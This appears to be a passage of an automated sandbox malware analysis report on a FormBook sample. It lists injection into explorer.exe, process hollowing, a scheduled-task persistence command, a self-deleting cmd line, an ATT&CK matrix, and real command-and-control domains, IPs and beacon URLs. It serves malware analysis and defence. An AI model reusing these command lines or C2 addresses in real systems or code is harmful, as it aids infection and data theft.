Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E590AF mov eax, dword ptr fs:[00000030h]	8_2_04E590AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4F0BF mov ecx, dword ptr fs:[00000030h]	8_2_04E4F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4F0BF mov eax, dword ptr fs:[00000030h]	8_2_04E4F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4F0BF mov eax, dword ptr fs:[00000030h]	8_2_04E4F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E19080 mov eax, dword ptr fs:[00000030h]	8_2_04E19080
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E93884 mov eax, dword ptr fs:[00000030h]	8_2_04E93884
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E93884 mov eax, dword ptr fs:[00000030h]	8_2_04E93884
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE1074 mov eax, dword ptr fs:[00000030h]	8_2_04EE1074
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED2073 mov eax, dword ptr fs:[00000030h]	8_2_04ED2073
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E30050 mov eax, dword ptr fs:[00000030h]	8_2_04E30050
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E30050 mov eax, dword ptr fs:[00000030h]	8_2_04E30050
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]	8_2_04E2B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]	8_2_04E2B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]	8_2_04E2B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h]	8_2_04E2B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]	8_2_04E4002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]	8_2_04E4002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]	8_2_04E4002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]	8_2_04E4002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h]	8_2_04E4002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE4015 mov eax, dword ptr fs:[00000030h]	8_2_04EE4015
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EE4015 mov eax, dword ptr fs:[00000030h]	8_2_04EE4015
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h]	8_2_04E97016
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h]	8_2_04E97016
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h]	8_2_04E97016
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h]	8_2_04E1B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h]	8_2_04E1B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h]	8_2_04E1B1E1
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04EA41E8 mov eax, dword ptr fs:[00000030h]	8_2_04EA41E8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E461A0 mov eax, dword ptr fs:[00000030h]	8_2_04E461A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E461A0 mov eax, dword ptr fs:[00000030h]	8_2_04E461A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]	8_2_04ED49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]	8_2_04ED49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]	8_2_04ED49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h]	8_2_04ED49A4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E969A6 mov eax, dword ptr fs:[00000030h]	8_2_04E969A6
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]	8_2_04E951BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]	8_2_04E951BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]	8_2_04E951BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h]	8_2_04E951BE
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3C182 mov eax, dword ptr fs:[00000030h]	8_2_04E3C182
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4A185 mov eax, dword ptr fs:[00000030h]	8_2_04E4A185
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42990 mov eax, dword ptr fs:[00000030h]	8_2_04E42990
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1C962 mov eax, dword ptr fs:[00000030h]	8_2_04E1C962
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1B171 mov eax, dword ptr fs:[00000030h]	8_2_04E1B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E1B171 mov eax, dword ptr fs:[00000030h]	8_2_04E1B171
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3B944 mov eax, dword ptr fs:[00000030h]	8_2_04E3B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E3B944 mov eax, dword ptr fs:[00000030h]	8_2_04E3B944
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]	8_2_04E34120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]	8_2_04E34120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]	8_2_04E34120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h]	8_2_04E34120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E34120 mov ecx, dword ptr fs:[00000030h]	8_2_04E34120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4513A mov eax, dword ptr fs:[00000030h]	8_2_04E4513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4513A mov eax, dword ptr fs:[00000030h]	8_2_04E4513A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h]	8_2_04E19100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h]	8_2_04E19100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h]	8_2_04E19100
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42AE4 mov eax, dword ptr fs:[00000030h]	8_2_04E42AE4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E42ACB mov eax, dword ptr fs:[00000030h]	8_2_04E42ACB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]	8_2_04E152A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]	8_2_04E152A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]	8_2_04E152A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]	8_2_04E152A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h]	8_2_04E152A5
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2AAB0 mov eax, dword ptr fs:[00000030h]	8_2_04E2AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E2AAB0 mov eax, dword ptr fs:[00000030h]	8_2_04E2AAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4FAB0 mov eax, dword ptr fs:[00000030h]	8_2_04E4FAB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4D294 mov eax, dword ptr fs:[00000030h]	8_2_04E4D294
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04E4D294 mov eax, dword ptr fs:[00000030h]	8_2_04E4D294

Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.208 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.77.226.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.44.212.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 146.148.193.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.155.166.181 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.105.124.225 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.49.23.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 173.234.175.134 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 205.134.254.189 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: B80000

Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000000.242933358.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Queries volume information: C:\Users\user\Desktop\J0OmHIagw8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\J0OmHIagw8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\J0OmHIagw8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery231	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion4	LSASS Memory	Virtualization/Sandbox Evasion4	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Timestomp1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
J0OmHIagw8.exe	31%	Virustotal		Browse
J0OmHIagw8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.stnanguo.com/csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT	100%	Avira URL Cloud	phishing
http://www.alparmuhendislik.com/csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.exit-divorce.com/csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT	100%	Avira URL Cloud	malware
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.travelnetafrica.com/csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.splendidhotelspa.com/csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.studentdividers.com/csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT	0%	Avira URL Cloud	safe
http://logo.verisign	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.soundon.events/csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
splendidhotelspa.com	205.134.254.189	true	true	unknown
queensboutique1000.com	142.44.212.169	true	true	unknown
studentdividers.com	34.102.136.180	true	true	unknown
www.travelnetafrica.com	173.234.175.134	true	true	unknown
www.fessusesefsee.com	45.77.226.209	true	true	unknown
epicmassiveconcepts.com	34.102.136.180	true	true	unknown
www.exit-divorce.com	192.155.166.181	true	true	unknown
www.alparmuhendislik.com	23.105.124.225	true	true	unknown
www.stnanguo.com	146.148.193.212	true	true	unknown
ext-cust.squarespace.com	198.49.23.144	true	false	high
logansshop.net	192.0.78.208	true	true	unknown
www.herbmedia.net	unknown	unknown	true	unknown
www.queensboutique1000.com	unknown	unknown	true	unknown
www.procreditexpert.com	unknown	unknown	true	unknown
www.studentdividers.com	unknown	unknown	true	unknown
www.logansshop.net	unknown	unknown	true	unknown
www.splendidhotelspa.com	unknown	unknown	true	unknown
www.thesouthbeachlife.com	unknown	unknown	true	unknown
www.soundon.events	unknown	unknown	true	unknown
www.latin-hotspot.com	unknown	unknown	true	unknown
www.epicmassiveconcepts.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.stnanguo.com/csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT	true	Avira URL Cloud: phishing	unknown
http://www.alparmuhendislik.com/csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.exit-divorce.com/csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT	true	Avira URL Cloud: malware	unknown
http://www.travelnetafrica.com/csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.splendidhotelspa.com/csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.studentdividers.com/csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT	true	Avira URL Cloud: safe	unknown
http://www.soundon.events/csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp	false		high
